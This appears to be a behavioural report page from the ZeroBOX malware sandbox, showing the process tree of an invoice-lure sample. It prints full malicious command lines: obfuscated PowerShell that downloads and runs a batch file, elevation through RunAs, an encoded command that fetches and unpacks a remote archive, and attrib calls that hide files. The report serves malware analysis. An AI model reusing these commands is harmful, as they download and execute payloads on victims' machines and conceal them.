| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\lib32.hta
3008
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr;
  2212
  - cmd.exe cmd /c ""C:\ProgramData\Fattura_IT9032003.bat" "
    2368
    - powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\ProgramData\Fattura_IT9032003.bat"' -ArgumentList 'am_admin'"
      2504
      - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\Fattura_IT9032003.bat" am_admin
        664
        
        powershell.exe powershell.exe -nologo -noprofile -WindowStyle hidden -exec bypass -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBOAEUAVAAtAEYAcgBhAG0AZQBXAG8AcgBrAC0AeAA2ADQALwBOAEUAVAAvAHIAYQB3AC8AbQBhAGkAbgAvAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwApADsAIABFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABOAEUAVABGAHIAYQBtAGUAdwBvAHIAawAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAJwA=
        1844
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F"
        2116
        
        xcopy.exe xcopy "C:\Program Files\NETFramework\start.exe" Fattura_IT9032003.bat.exe /y
        2636
        
        attrib.exe attrib +s +h Fattura_IT9032003.bat.exe
        2492
        
        attrib.exe attrib -s -h Fattura_IT9032003.bat.exe
        2824

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents